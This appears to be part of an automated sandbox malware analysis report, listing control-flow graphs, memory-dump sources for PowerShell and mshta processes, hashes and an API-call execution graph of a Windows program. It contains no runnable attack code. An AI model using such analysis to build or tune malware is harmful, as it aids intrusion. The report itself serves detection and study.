                                                                                                                                                                                    control_flow_graph 181 7fe89a9563d-7fe89a95647 182 7fe89a95649 181->182 183 7fe89a9564e-7fe89a9565f 181->183 182->183 184 7fe89a9564b 182->184 185 7fe89a95666-7fe89a95677 183->185 186 7fe89a95661 183->186 184->183 188 7fe89a95679 185->188 189 7fe89a9567e-7fe89a9568f 185->189 186->185 187 7fe89a95663 186->187 187->185 188->189 190 7fe89a9567b 188->190 191 7fe89a95696-7fe89a956a7 189->191 192 7fe89a95691 189->192 190->189 194 7fe89a956a9 191->194 195 7fe89a956ae-7fe89a956c1 191->195 192->191 193 7fe89a95693 192->193 193->191 194->195 196 7fe89a956ab 194->196 197 7fe89a956de-7fe89a95708 195->197 198 7fe89a956c2 195->198 196->195 200 7fe89a9570a-7fe89a9570c 197->200 201 7fe89a95760-7fe89a9576a 197->201 198->197 199 7fe89a956c4-7fe89a956dd 198->199 199->197 202 7fe89a95770-7fe89a9577a 201->202 203 7fe89a958d3-7fe89a9599c 201->203 204 7fe89a9577c-7fe89a95789 202->204 205 7fe89a95793-7fe89a95798 202->205 204->205 206 7fe89a9578b-7fe89a95791 204->206 207 7fe89a9579e-7fe89a957a1 205->207 208 7fe89a95873-7fe89a9587d 205->208 206->205 212 7fe89a957e6 207->212 213 7fe89a957a3-7fe89a957b2 207->213 210 7fe89a9588e-7fe89a9589e 208->210 211 7fe89a9587f-7fe89a9588d 208->211 214 7fe89a958ab-7fe89a958d0 210->214 215 7fe89a958a0-7fe89a958a4 210->215 216 7fe89a957e8-7fe89a957ea 212->216 213->203 225 7fe89a957b8-7fe89a957c2 213->225 214->203 215->214 216->208 219 7fe89a957f0-7fe89a957f6 216->219 222 7fe89a957f8-7fe89a95805 219->222 223 7fe89a95812-7fe89a95843 219->223 222->223 226 7fe89a95807-7fe89a95810 222->226 235 7fe89a9584a-7fe89a95854 223->235 227 7fe89a957db-7fe89a957e4 225->227 228 7fe89a957c4-7fe89a957d1 225->228 226->223 227->216 228->227 229 7fe89a957d3-7fe89a957d9 228->229 229->227 236 7fe89a9585a-7fe89a95872 235->236
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2db887b1ae9236182e548046961c29e420674051bd1f55e66ede302fb8a92f3f
                                                                                                                                                                                    • Instruction ID: e214c11619c4d21d0a8292f976bb89f3587f61366a3bb39e0fbfc5cc3873a7b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2db887b1ae9236182e548046961c29e420674051bd1f55e66ede302fb8a92f3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EC1F43080E7C91FD757A7286C156A57FE0FF47260F1911EBD48DCB0A3D619A91AC3A2
                                                                                                                                                                                    Function 000007FE89A90F4B Relevance: .3, Instructions: 329COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 238 7fe89a90f4b-7fe89a90f96 239 7fe89a91098-7fe89a910c8 238->239 240 7fe89a90f9c-7fe89a90fa6 238->240 248 7fe89a910e9-7fe89a910eb 239->248 249 7fe89a910ca 239->249 241 7fe89a90fa8-7fe89a90fb5 240->241 242 7fe89a90fbf-7fe89a90fee 240->242 241->242 243 7fe89a90fb7-7fe89a90fbd 241->243 242->239 256 7fe89a90ff4-7fe89a90ffe 242->256 243->242 253 7fe89a910ed-7fe89a91124 248->253 251 7fe89a910e6-7fe89a910e8 249->251 252 7fe89a910cc-7fe89a910dc 249->252 251->248 252->253 257 7fe89a910de-7fe89a910e5 252->257 254 7fe89a9112a-7fe89a9119e 253->254 255 7fe89a911c1-7fe89a911cb 253->255 275 7fe89a911a6-7fe89a911be 254->275 260 7fe89a911d8-7fe89a911e8 255->260 261 7fe89a911cd-7fe89a911d7 255->261 258 7fe89a91017-7fe89a91077 256->258 259 7fe89a91000-7fe89a9100d 256->259 257->251 271 7fe89a91079-7fe89a91084 258->271 272 7fe89a9108b-7fe89a91097 258->272 259->258 263 7fe89a9100f-7fe89a91015 259->263 264 7fe89a911ea-7fe89a911ee 260->264 265 7fe89a911f5-7fe89a9121a 260->265 263->258 264->265 271->272 275->255
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 4c33a27c45e39dd55152a7ca14cb384796b036997d464d3851c8e24517ecec13
                                                                                                                                                                                    • Instruction ID: a35224e8a5fc0dd852c363bf30d2c98f11bf4fa6a3cb03fd823c31c7bd0ff40f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c33a27c45e39dd55152a7ca14cb384796b036997d464d3851c8e24517ecec13
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34A1E321A0D7C90FE347933C58642657FE1EF57258B2A00EBC48ECB2B3D9199C5AC362
                                                                                                                                                                                    Function 000007FE89A95711 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 276 7fe89a95711-7fe89a9576a 278 7fe89a95770-7fe89a9577a 276->278 279 7fe89a958d3-7fe89a9599c 276->279 280 7fe89a9577c-7fe89a95789 278->280 281 7fe89a95793-7fe89a95798 278->281 280->281 282 7fe89a9578b-7fe89a95791 280->282 283 7fe89a9579e-7fe89a957a1 281->283 284 7fe89a95873-7fe89a9587d 281->284 282->281 288 7fe89a957e6 283->288 289 7fe89a957a3-7fe89a957b2 283->289 286 7fe89a9588e-7fe89a9589e 284->286 287 7fe89a9587f-7fe89a9588d 284->287 290 7fe89a958ab-7fe89a958d0 286->290 291 7fe89a958a0-7fe89a958a4 286->291 292 7fe89a957e8-7fe89a957ea 288->292 289->279 301 7fe89a957b8-7fe89a957c2 289->301 290->279 291->290 292->284 295 7fe89a957f0-7fe89a957f6 292->295 298 7fe89a957f8-7fe89a95805 295->298 299 7fe89a95812-7fe89a95854 295->299 298->299 302 7fe89a95807-7fe89a95810 298->302 312 7fe89a9585a-7fe89a95872 299->312 303 7fe89a957db-7fe89a957e4 301->303 304 7fe89a957c4-7fe89a957d1 301->304 302->299 303->292 304->303 305 7fe89a957d3-7fe89a957d9 304->305 305->303
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 92b0ccf5e7ef81338079fc0dabc379aedafd360589d1f3880bf6f5c45d79452f
                                                                                                                                                                                    • Instruction ID: 2ae59068010bba5a2da6a43d5c0532647aa243228902afaa8e7a12b941e81b6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92b0ccf5e7ef81338079fc0dabc379aedafd360589d1f3880bf6f5c45d79452f
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD416631D1CBCA0FE356A72C58513B97FE0FF86654F1920EAC88DC71A3DA25AC168391

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 000007FE89A96FBE Relevance: .6, Instructions: 578COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5751fa37b8bf67346066c2508a03ebe440285156502c7377ebd27533bf64d32e
                                                                                                                                                                                    • Instruction ID: a180c23f53202944daa4aab35a737c6a9aaf68608d028dafa083a0d69be27d5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5751fa37b8bf67346066c2508a03ebe440285156502c7377ebd27533bf64d32e
                                                                                                                                                                                    • Instruction Fuzzy Hash: AEF1372090EBC90FD747A73898246A53FE1EF57254F1A01EBD48DCB1B3D6199D1AC362
                                                                                                                                                                                    Function 000007FE89A934CE Relevance: .3, Instructions: 344COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.475254905.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 04582941e3ab7a2340c6b2ad06a7b95137007e05c1b495a42e0aff5d0ad64d06
                                                                                                                                                                                    • Instruction ID: 3416949948f66360e815639a5eb11ed785e15423ed4a9d9bdc8fecc5729064fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04582941e3ab7a2340c6b2ad06a7b95137007e05c1b495a42e0aff5d0ad64d06
                                                                                                                                                                                    • Instruction Fuzzy Hash: 57B1152080E7C90FE747A77858242A63FF1EF5B254F1A01EBD48DCB1A3D6199D19C362

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 02F50FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000E.00000003.486972216.0000000002F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_14_3_2f50000_mshta.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                    • Instruction ID: 63e5c6e79e49da48900b29d6e64dc1223565d49ace30694e007436321aec22b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                    Function 02F50FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000E.00000003.486972216.0000000002F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_14_3_2f50000_mshta.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                    • Instruction ID: 63e5c6e79e49da48900b29d6e64dc1223565d49ace30694e007436321aec22b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                    Function 02F50FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000E.00000003.486972216.0000000002F50000.00000010.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_14_3_2f50000_mshta.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                    • Instruction ID: 63e5c6e79e49da48900b29d6e64dc1223565d49ace30694e007436321aec22b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:5.5%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                    Signature Coverage:2.8%
                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                    Total number of Limit Nodes:56
                                                                                                                                                                                    execution_graph 37661 4466f4 37680 446904 37661->37680 37663 446700 GetModuleHandleA 37666 446710 __set_app_type __p__fmode __p__commode 37663->37666 37665 4467a4 37667 4467ac __setusermatherr 37665->37667 37668 4467b8 37665->37668 37666->37665 37667->37668 37681 4468f0 _controlfp 37668->37681 37670 4467bd _initterm GetEnvironmentStringsW _initterm 37671 44681e GetStartupInfoW 37670->37671 37672 446810 37670->37672 37674 446866 GetModuleHandleA 37671->37674 37682 41276d 37674->37682 37678 446896 exit 37679 44689d _cexit 37678->37679 37679->37672 37680->37663 37681->37670 37683 41277d 37682->37683 37725 4044a4 LoadLibraryW 37683->37725 37685 412785 37717 412789 37685->37717 37733 414b81 37685->37733 37688 4127c8 37739 412465 memset ??2@YAPAXI 37688->37739 37690 4127ea 37751 40ac21 37690->37751 37695 412813 37769 40dd07 memset 37695->37769 37696 412827 37774 40db69 memset 37696->37774 37699 412822 37796 4125b6 ??3@YAXPAX DeleteObject 37699->37796 37701 40ada2 _wcsicmp 37704 41283d 37701->37704 37703 412966 37797 40b1ab free free 37703->37797 37704->37699 37705 412863 CoInitialize 37704->37705 37779 41268e 37704->37779 37795 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37705->37795 37709 41296f 37798 40b633 37709->37798 37711 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37716 412957 CoUninitialize 37711->37716 37722 4128ca 37711->37722 37716->37699 37717->37678 37717->37679 37718 4128d0 TranslateAcceleratorW 37719 412941 GetMessageW 37718->37719 37718->37722 37719->37716 37719->37718 37720 412909 IsDialogMessageW 37720->37719 37720->37722 37721 4128fd IsDialogMessageW 37721->37719 37721->37720 37722->37718 37722->37720 37722->37721 37723 41292b TranslateMessage DispatchMessageW 37722->37723 37724 41291f IsDialogMessageW 37722->37724 37723->37719 37724->37719 37724->37723 37726 4044f7 37725->37726 37727 4044cf GetProcAddress 37725->37727 37731 404507 MessageBoxW 37726->37731 37732 40451e 37726->37732 37728 4044e8 FreeLibrary 37727->37728 37729 4044df 37727->37729 37728->37726 37730 4044f3 37728->37730 37729->37728 37730->37726 37731->37685 37732->37685 37734 414b8a 37733->37734 37735 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37733->37735 37802 40a804 memset 37734->37802 37735->37688 37738 414b9e GetProcAddress 37738->37735 37740 4124e0 37739->37740 37741 412505 ??2@YAPAXI 37740->37741 37742 412521 37741->37742 37743 41251c 37741->37743 37813 444722 37742->37813 37824 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37743->37824 37750 41259b wcscpy 37750->37690 37829 40b1ab free free 37751->37829 37753 40ac5c 37756 40a9ce malloc memcpy free free 37753->37756 37757 40ad4b 37753->37757 37759 40ace7 free 37753->37759 37764 40ad76 37753->37764 37833 40a8d0 37753->37833 37845 4099f4 37753->37845 37756->37753 37757->37764 37853 40a9ce 37757->37853 37759->37753 37763 40a8d0 7 API calls 37763->37764 37830 40aa04 37764->37830 37765 40ada2 37766 40adaa 37765->37766 37767 40adc9 37765->37767 37766->37767 37768 40adb3 _wcsicmp 37766->37768 37767->37695 37767->37696 37768->37766 37768->37767 37858 40dce0 37769->37858 37771 40dd3a GetModuleHandleW 37863 40dba7 37771->37863 37775 40dce0 3 API calls 37774->37775 37776 40db99 37775->37776 37935 40dae1 37776->37935 37949 402f3a 37779->37949 37781 412766 37781->37699 37781->37705 37782 4126d3 _wcsicmp 37783 4126a8 37782->37783 37783->37781 37783->37782 37785 41270a 37783->37785 37983 4125f8 7 API calls 37783->37983 37785->37781 37952 411ac5 37785->37952 37795->37711 37796->37703 37797->37709 37799 40b640 37798->37799 37800 40b639 free 37798->37800 37801 40b1ab free free 37799->37801 37800->37799 37801->37717 37803 40a83b GetSystemDirectoryW 37802->37803 37804 40a84c wcscpy 37802->37804 37803->37804 37809 409719 wcslen 37804->37809 37807 40a881 LoadLibraryW 37808 40a886 37807->37808 37808->37735 37808->37738 37810 409724 37809->37810 37811 409739 wcscat LoadLibraryW 37809->37811 37810->37811 37812 40972c wcscat 37810->37812 37811->37807 37811->37808 37812->37811 37814 444732 37813->37814 37815 444728 DeleteObject 37813->37815 37825 409cc3 37814->37825 37815->37814 37817 412551 37818 4010f9 37817->37818 37819 401130 37818->37819 37820 401134 GetModuleHandleW LoadIconW 37819->37820 37821 401107 wcsncat 37819->37821 37822 40a7be 37820->37822 37821->37819 37823 40a7d2 37822->37823 37823->37750 37823->37823 37824->37742 37828 409bfd memset wcscpy 37825->37828 37827 409cdb CreateFontIndirectW 37827->37817 37828->37827 37829->37753 37831 40aa14 37830->37831 37832 40aa0a free 37830->37832 37831->37765 37832->37831 37834 40a8eb 37833->37834 37835 40a8df wcslen 37833->37835 37836 40a906 free 37834->37836 37837 40a90f 37834->37837 37835->37834 37838 40a919 37836->37838 37839 4099f4 3 API calls 37837->37839 37840 40a932 37838->37840 37841 40a929 free 37838->37841 37839->37838 37843 4099f4 3 API calls 37840->37843 37842 40a93e memcpy 37841->37842 37842->37753 37844 40a93d 37843->37844 37844->37842 37846 409a41 37845->37846 37847 4099fb malloc 37845->37847 37846->37753 37849 409a37 37847->37849 37850 409a1c 37847->37850 37849->37753 37851 409a30 free 37850->37851 37852 409a20 memcpy 37850->37852 37851->37849 37852->37851 37854 40a9e7 37853->37854 37855 40a9dc free 37853->37855 37857 4099f4 3 API calls 37854->37857 37856 40a9f2 37855->37856 37856->37763 37857->37856 37882 409bca GetModuleFileNameW 37858->37882 37860 40dce6 wcsrchr 37861 40dcf5 37860->37861 37862 40dcf9 wcscat 37860->37862 37861->37862 37862->37771 37883 44db70 37863->37883 37867 40dbfd 37886 4447d9 37867->37886 37870 40dc34 wcscpy wcscpy 37912 40d6f5 37870->37912 37871 40dc1f wcscpy 37871->37870 37874 40d6f5 3 API calls 37875 40dc73 37874->37875 37876 40d6f5 3 API calls 37875->37876 37877 40dc89 37876->37877 37878 40d6f5 3 API calls 37877->37878 37879 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37878->37879 37918 40da80 37879->37918 37882->37860 37884 40dbb4 memset memset 37883->37884 37885 409bca GetModuleFileNameW 37884->37885 37885->37867 37888 4447f4 37886->37888 37887 40dc1b 37887->37870 37887->37871 37888->37887 37889 444807 ??2@YAPAXI 37888->37889 37890 44481f 37889->37890 37891 444873 _snwprintf 37890->37891 37892 4448ab wcscpy 37890->37892 37925 44474a 8 API calls 37891->37925 37894 4448bb 37892->37894 37926 44474a 8 API calls 37894->37926 37895 4448a7 37895->37892 37895->37894 37897 4448cd 37927 44474a 8 API calls 37897->37927 37899 4448e2 37928 44474a 8 API calls 37899->37928 37901 4448f7 37929 44474a 8 API calls 37901->37929 37903 44490c 37930 44474a 8 API calls 37903->37930 37905 444921 37931 44474a 8 API calls 37905->37931 37907 444936 37932 44474a 8 API calls 37907->37932 37909 44494b 37933 44474a 8 API calls 37909->37933 37911 444960 ??3@YAXPAX 37911->37887 37913 44db70 37912->37913 37914 40d702 memset GetPrivateProfileStringW 37913->37914 37915 40d752 37914->37915 37916 40d75c WritePrivateProfileStringW 37914->37916 37915->37916 37917 40d758 37915->37917 37916->37917 37917->37874 37919 44db70 37918->37919 37920 40da8d memset 37919->37920 37921 40daac LoadStringW 37920->37921 37924 40dac6 37921->37924 37923 40dade 37923->37699 37924->37921 37924->37923 37934 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37924->37934 37925->37895 37926->37897 37927->37899 37928->37901 37929->37903 37930->37905 37931->37907 37932->37909 37933->37911 37934->37924 37945 409b98 GetFileAttributesW 37935->37945 37937 40daea 37938 40daef wcscpy wcscpy GetPrivateProfileIntW 37937->37938 37944 40db63 37937->37944 37946 40d65d GetPrivateProfileStringW 37938->37946 37940 40db3e 37947 40d65d GetPrivateProfileStringW 37940->37947 37942 40db4f 37948 40d65d GetPrivateProfileStringW 37942->37948 37944->37701 37945->37937 37946->37940 37947->37942 37948->37944 37984 40eaff 37949->37984 37953 411ae2 memset 37952->37953 37954 411b8f 37952->37954 38024 409bca GetModuleFileNameW 37953->38024 37966 411a8b 37954->37966 37956 411b0a wcsrchr 37957 411b22 wcscat 37956->37957 37958 411b1f 37956->37958 38025 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37957->38025 37958->37957 37960 411b67 38026 402afb 37960->38026 37964 411b7f 38082 40ea13 SendMessageW memset SendMessageW 37964->38082 37967 402afb 27 API calls 37966->37967 37968 411ac0 37967->37968 37969 4110dc 37968->37969 37970 4110f0 37969->37970 37971 41113e 37969->37971 37970->37971 37974 4110f7 _wcsicmp 37970->37974 38129 410c46 10 API calls 37970->38129 38107 40969c LoadCursorW SetCursor 37971->38107 37973 411143 38108 4032b4 37973->38108 38126 444a54 37973->38126 37974->37970 37975 411157 37976 40ada2 _wcsicmp 37975->37976 37979 411167 37976->37979 37977 4111af 37979->37977 37980 4111a6 qsort 37979->37980 37980->37977 37983->37783 37985 40eb10 37984->37985 37997 40e8e0 37985->37997 37988 40eb6c memcpy memcpy 37989 40ebb7 37988->37989 37989->37988 37990 40d134 16 API calls 37989->37990 37991 40ebf2 ??2@YAPAXI ??2@YAPAXI 37989->37991 37990->37989 37992 40ec65 37991->37992 37993 40ec2e ??2@YAPAXI 37991->37993 38007 40ea7f 37992->38007 37993->37992 37996 402f49 37996->37783 37998 40e8f2 37997->37998 37999 40e8eb ??3@YAXPAX 37997->37999 38000 40e900 37998->38000 38001 40e8f9 ??3@YAXPAX 37998->38001 37999->37998 38002 40e911 38000->38002 38003 40e90a ??3@YAXPAX 38000->38003 38001->38000 38004 40e931 ??2@YAPAXI ??2@YAPAXI 38002->38004 38005 40e921 ??3@YAXPAX 38002->38005 38006 40e92a ??3@YAXPAX 38002->38006 38003->38002 38004->37988 38005->38006 38006->38004 38008 40aa04 free 38007->38008 38009 40ea88 38008->38009 38010 40aa04 free 38009->38010 38011 40ea90 38010->38011 38012 40aa04 free 38011->38012 38013 40ea98 38012->38013 38014 40aa04 free 38013->38014 38015 40eaa0 38014->38015 38016 40a9ce 4 API calls 38015->38016 38017 40eab3 38016->38017 38018 40a9ce 4 API calls 38017->38018 38019 40eabd 38018->38019 38020 40a9ce 4 API calls 38019->38020 38021 40eac7 38020->38021 38022 40a9ce 4 API calls 38021->38022 38023 40ead1 38022->38023 38023->37996 38024->37956 38025->37960 38083 40b2cc 38026->38083 38028 402b0a 38029 40b2cc 27 API calls 38028->38029 38030 402b23 38029->38030 38031 40b2cc 27 API calls 38030->38031 38032 402b3a 38031->38032 38033 40b2cc 27 API calls 38032->38033 38034 402b54 38033->38034 38035 40b2cc 27 API calls 38034->38035 38036 402b6b 38035->38036 38037 40b2cc 27 API calls 38036->38037 38038 402b82 38037->38038 38039 40b2cc 27 API calls 38038->38039 38040 402b99 38039->38040 38041 40b2cc 27 API calls 38040->38041 38042 402bb0 38041->38042 38043 40b2cc 27 API calls 38042->38043 38044 402bc7 38043->38044 38045 40b2cc 27 API calls 38044->38045 38046 402bde 38045->38046 38047 40b2cc 27 API calls 38046->38047 38048 402bf5 38047->38048 38049 40b2cc 27 API calls 38048->38049 38050 402c0c 38049->38050 38051 40b2cc 27 API calls 38050->38051 38052 402c23 38051->38052 38053 40b2cc 27 API calls 38052->38053 38054 402c3a 38053->38054 38055 40b2cc 27 API calls 38054->38055 38056 402c51 38055->38056 38057 40b2cc 27 API calls 38056->38057 38058 402c68 38057->38058 38059 40b2cc 27 API calls 38058->38059 38060 402c7f 38059->38060 38061 40b2cc 27 API calls 38060->38061 38062 402c99 38061->38062 38063 40b2cc 27 API calls 38062->38063 38064 402cb3 38063->38064 38065 40b2cc 27 API calls 38064->38065 38066 402cd5 38065->38066 38067 40b2cc 27 API calls 38066->38067 38068 402cf0 38067->38068 38069 40b2cc 27 API calls 38068->38069 38070 402d0b 38069->38070 38071 40b2cc 27 API calls 38070->38071 38072 402d26 38071->38072 38073 40b2cc 27 API calls 38072->38073 38074 402d3e 38073->38074 38075 40b2cc 27 API calls 38074->38075 38076 402d59 38075->38076 38077 40b2cc 27 API calls 38076->38077 38078 402d78 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402d93 38079->38080 38081 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38080->38081 38081->37964 38082->37954 38086 40b58d 38083->38086 38085 40b2d1 38085->38028 38087 40b5a4 GetModuleHandleW FindResourceW 38086->38087 38088 40b62e 38086->38088 38089 40b5c2 LoadResource 38087->38089 38091 40b5e7 38087->38091 38088->38085 38090 40b5d0 SizeofResource LockResource 38089->38090 38089->38091 38090->38091 38091->38088 38099 40afcf 38091->38099 38093 40b608 memcpy 38102 40b4d3 memcpy 38093->38102 38095 40b61e 38103 40b3c1 18 API calls 38095->38103 38097 40b626 38104 40b04b 38097->38104 38100 40b04b ??3@YAXPAX 38099->38100 38101 40afd7 ??2@YAPAXI 38100->38101 38101->38093 38102->38095 38103->38097 38105 40b051 ??3@YAXPAX 38104->38105 38106 40b05f 38104->38106 38105->38106 38106->38088 38107->37973 38109 4032c4 38108->38109 38110 40b633 free 38109->38110 38111 403316 38110->38111 38130 44553b 38111->38130 38115 403480 38328 40368c 15 API calls 38115->38328 38117 403489 38118 40b633 free 38117->38118 38119 403495 38118->38119 38119->37975 38120 4033a9 memset memcpy 38121 4033ec wcscmp 38120->38121 38122 40333c 38120->38122 38121->38122 38122->38115 38122->38120 38122->38121 38326 4028e7 11 API calls 38122->38326 38327 40f508 6 API calls 38122->38327 38124 403421 _wcsicmp 38124->38122 38127 444a64 FreeLibrary 38126->38127 38128 444a83 38126->38128 38127->38128 38128->37975 38129->37970 38131 445548 38130->38131 38132 445599 38131->38132 38329 40c768 38131->38329 38133 4455a8 memset 38132->38133 38140 4457f2 38132->38140 38413 403988 38133->38413 38144 445854 38140->38144 38516 403e2d memset memset memset memset memset 38140->38516 38141 445672 38424 403fbe memset memset memset memset memset 38141->38424 38142 4458bb memset memset 38147 414c2e 17 API calls 38142->38147 38192 4458aa 38144->38192 38539 403c9c memset memset memset memset memset 38144->38539 38145 44595e memset memset 38151 414c2e 17 API calls 38145->38151 38146 4455e5 38146->38141 38158 44560f 38146->38158 38152 4458f9 38147->38152 38148 44557a 38188 44558c 38148->38188 38393 4136c0 38148->38393 38150 445a00 memset memset 38155 414c2e 17 API calls 38150->38155 38156 44599c 38151->38156 38157 40b2cc 27 API calls 38152->38157 38164 445a3e 38155->38164 38166 40b2cc 27 API calls 38156->38166 38167 445909 38157->38167 38169 4087b3 338 API calls 38158->38169 38160 445bca 38168 445c8b memset memset 38160->38168 38229 445cf0 38160->38229 38161 445b38 memset memset memset 38172 445bd4 38161->38172 38173 445b98 38161->38173 38162 445849 38607 40b1ab free free 38162->38607 38179 40b2cc 27 API calls 38164->38179 38174 4459ac 38166->38174 38183 409d1f 6 API calls 38167->38183 38175 414c2e 17 API calls 38168->38175 38184 445621 38169->38184 38171 44589f 38608 40b1ab free free 38171->38608 38562 414c2e 38172->38562 38173->38172 38177 445ba2 38173->38177 38186 409d1f 6 API calls 38174->38186 38187 445cc9 38175->38187 38700 4099c6 wcslen 38177->38700 38178 4456b2 38595 40b1ab free free 38178->38595 38191 445a4f 38179->38191 38182 403335 38325 4452e5 45 API calls 38182->38325 38197 445919 38183->38197 38593 4454bf 20 API calls 38184->38593 38185 445823 38185->38162 38198 4087b3 338 API calls 38185->38198 38200 4459bc 38186->38200 38201 409d1f 6 API calls 38187->38201 38397 444b06 38188->38397 38189 445879 38189->38171 38212 4087b3 338 API calls 38189->38212 38204 409d1f 6 API calls 38191->38204 38192->38142 